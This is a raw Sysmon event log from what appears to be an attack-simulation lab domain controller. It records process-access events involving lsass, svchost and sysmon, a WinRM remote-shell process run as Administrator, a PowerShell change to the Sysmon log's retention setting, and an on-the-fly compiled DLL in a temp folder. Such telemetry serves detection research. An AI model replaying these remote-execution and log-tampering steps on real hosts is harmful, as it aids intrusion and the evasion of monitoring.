13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8C95-6005-0500-00000000A201}6401196C:\Windows\system32\csrss.exe{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.919{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.919{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{59A5CD1D-8CA8-6005-0C00-00000000A201}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.903{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.903{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.903{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.685{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.685{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.685{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.638{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.638{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.622{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
13241300x8000000000000000423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:20.481{59A5CD1D-8E1F-6005-CE02-00000000A201}3720C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\RetentionDWORD (0x00000000) 10341000x8000000000000000422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.325{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:20.325{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:20.325{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x8000000000000000419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:33:20.169{59A5CD1D-8E20-6005-D002-00000000A201}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\t4kqsmcp.dll2021-01-18 13:33:20.075 10341000x8000000000000000418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 